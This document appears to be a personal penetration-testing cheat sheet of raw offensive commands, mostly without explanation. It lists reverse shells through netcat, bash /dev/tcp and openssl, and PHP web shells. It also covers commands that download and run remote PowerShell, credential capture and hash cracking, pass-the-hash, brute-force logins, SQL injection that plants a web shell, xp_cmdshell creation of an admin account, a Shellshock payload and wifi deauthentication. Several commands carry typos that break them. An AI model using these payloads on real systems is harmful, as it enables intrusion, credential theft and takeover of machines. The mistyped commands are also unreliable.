Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host The Payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
Filedownload
PowerShell
powershell IEX(new-object net.webclient).downloadstring(‘http://10.1.1.10/empire.ps1‘)”
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http:// 192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.268.1.1. 82 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incomming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file
ftp -s ftp.txt
Ftp 192.168.1.1.1
ls
get nc.exe
put nc.exe
set binary
Reverse Shell
Netcat
Ncat to get support for ssl and rules
Listener
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 25
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Shell from dash or bad shell
Attacker:
nc -nlvp 9001
Victim
bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’
You get shell on Attacker then
python -c ‘import pty; pty.spawn(“/bin/bash”)’
After that
script -q /dev/null
Then backround
ctrl z
Then type
stty raw -echo
Then hit fg for foreground
OpenSSH
Create Cert
openssl req -x509 -newkey
rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the Listener on Attacker
openssl s_server -quiet
-key key.pem -cert cert.pem -port 4444
Start reverse shell on victim with openssl
mkfifo /tmp/s; /bin/sh -i <
/tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1. >
/tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET[‘cmd’]);?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
set TERM=linux
No real bash
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up responder to listen to clients and capture hashes
responder
•Default location: “/usr/share/responder/”
•Stores hashes in Responder.db
Captures password hashes you can crack with John The Ripper
Capture LTM hashes from sql injection
Start smb server On Attacker
impacket-smbserver share $(pwd)
Use this on the webpage:
; use master; exec xp_dirtree ‘\\10.1.1.1\share’;–
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 haches.txt /opt/share/wordlist/rocky.txt
to launch a combination attack against MD5 password hashes
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
a straight through attack is super fast on simple passwords
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt -format=nt -show (CrackNTLM)
use the cewel.txt in john the ripper to
john –wordlist=cvewl.txt –rules –stdout > pass.txt
john –wordlist:/usr/share/wordlists/rockyou.txt
RSA
Now we need to convert the rsa key to john format and save it in a file:
#root@kali: ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist:
#root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile
When it’s done, you can show the password if it has been cracked by issuing the following command:
#root@kali: john –show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
crunch Create Passwordlists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medua -h 192.168.1.1. -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
use for rdp brute force
ncrack -v -f –user administrator -P password.txt rdp//192.168.1.1,CL1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use burpsuite to capture login request
Save login request to login.req
sqlmap r login.req –level 5
Search for databases
sqlmap –u http://192.168.1.1/index.php?par= –dbs
Checking privileges of the users in database
sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges
Reading a file from the web server
sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch
Dump Username and Password
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5
Dump tables
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump
Automated Shell
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell
sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch
sqlmap -l trace.txt –dbs (RDBMS Enum)
sqlmap -l trace.txt -D <db> –tables (Dump tables)
sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)
Crawl links
sqlmap -u http://192.168.1.1 –crawl=1
sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3
Dev Console, find Cookie, search "document.cookie"
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> --dbs
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope --tables and press Enter.
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope -T User_Login --columns and press Enter
Manual sql injection commands
Check for sqli vulnerability
?id=1′
Find the number of columns
?id=1 order by 9 — –
Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 — –
Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 — –
Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 — –
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read file
?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –
Create a file and call it to check if really created
?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –
?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –
Then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
Sql injections
User name
Password
SQL Query
tom
tom
SELECT * FROM users
WHERE name=’tom’
and password=’tom’
tom
‘ or ‘1’=’1
SELECT * FROM users
WHERE name=’tom’
and password=” or ‘1’=’1′
tom
‘ or 1=’1
SELECT * FROM users
WHERE name=’tom’
and password=” or 1=’1′
tom
1′ or 1=1 — –
SELECT * FROM users
WHERE name=’tom’
and password=” or 1=1— -‘
‘ or ‘1’=’1
‘ or ‘1’=’1
SELECT * FROM users
WHERE name=” or ‘1’=’1′
and password=” or ‘1’=’1′
‘ or ‘ 1=1
‘ or ‘ 1=1
SELECT * FROM users
WHERE name=” or ‘ 1=1’
and password=” or ‘ 1=1’
1′ or 1=1 — –
blah
SELECT * FROM users
WHERE name=’1′ or 1=1 — -‘
and password=’blah’
‘or 1=1#
‘ or ‘1’=’1
blah';insert into login values ('john','apple123'); --
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell ‘whoami’
go
exec xp_cmdshell ‘net user roger pass /add’
go
exec xp_cmdshell ‘net localgroup Administrators roger /add’
go
exec xp_cmdshell ‘net localgroup “Remote Desktop Users” roger /add’
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide –extract -sf ./Granted.jpg
binwalk -e
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
ProxyChains
Comming
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 -reverse -v
Client (Victim)
chisell client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilage Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB..” /C:”KB..”
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s >pass.txt
reg query HKCU /f password /t REG_SZ /s >pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things that I have used from this page is:
# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 [email protected]
ssh -R 8080:127.0.0.1:80 [email protected]
Binary Exploitation
Tools
OllyDebuger
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP Control the path of Code execution
Debug Applications
r2
aaa (Analyse all)
afl (List funtions)
pdf @ main
pdc @main as c code
ldd list libarary to an application
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby mach was was found in the EIP
/usr/share/metaspoit-framwork/tools/pattern_offset.rb
Ruby find jmp esp
/usr/share/metaspoit-framwork/tools/nasm_shell.rb
JMP ESP
Shrink Go Binaries
Shrink go binaries
go build -ldfkags=”-s -w”
and
upx brute chisel
Tcp dump icmp packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n ’ asjdflkjalskdjflkjasdfljldkf’ | md5sum
Run a command immune to hangups
nohup
Wireless
### Check Config
iwconfig
### Enable Monitoring
airmon-ng start
iwconfig
### Looking for AP
airodump-ng wlan0mon
### Looking for Clients
airodump-ng –bssid <ap> –channel <ap channel> wlan0mon
### Start Recording
airodump-ng –bssid <ap> –channel <ap channel> –showack -w wpa_log wlan0mon
### Deauth
airplay-ng -0 20 -a <ap> -c <client> wlan0mon
## Crack
aicrack-ng wpa_log.cpa -w usr/share/wordlist/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Magic Numbers
https://en.wikipedia.org/wiki/List_of_file_signatures
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Github tools
0d1n
Door404
Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite